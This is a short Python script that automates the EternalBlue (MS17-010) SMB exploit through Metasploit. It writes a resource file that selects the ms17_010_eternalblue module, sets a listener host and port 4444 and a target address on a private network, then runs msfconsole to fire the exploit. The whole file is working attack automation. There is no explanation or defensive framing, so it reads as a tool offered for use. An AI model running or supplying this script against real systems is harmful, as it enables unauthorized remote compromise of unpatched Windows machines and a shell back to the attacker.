
# -*- coding:utf-8 -*-

import os


def Handler(configFile, lhost, lport, rhost):
    configFile.write('use exploit/windows/smb/ms17_010_eternalblue\n')

    configFile.write('set LPORT ' + str(lport) + '\n')

    configFile.write('set LHOST ' + str(lhost) + '\n')

    configFile.write('set RHOST ' + str(rhost) + '\n')

    configFile.write('exploit\n')


def main():
    configFile = open('ms17_010.rc', 'w')

    lhost = '192.168.2.112'

    lport = 4444

    rhost = '192.168.2.109'

    Handler(configFile, lhost, lport, rhost)

    configFile.close()

    os.system('msfconsole -r ms17_010.rc')


main()
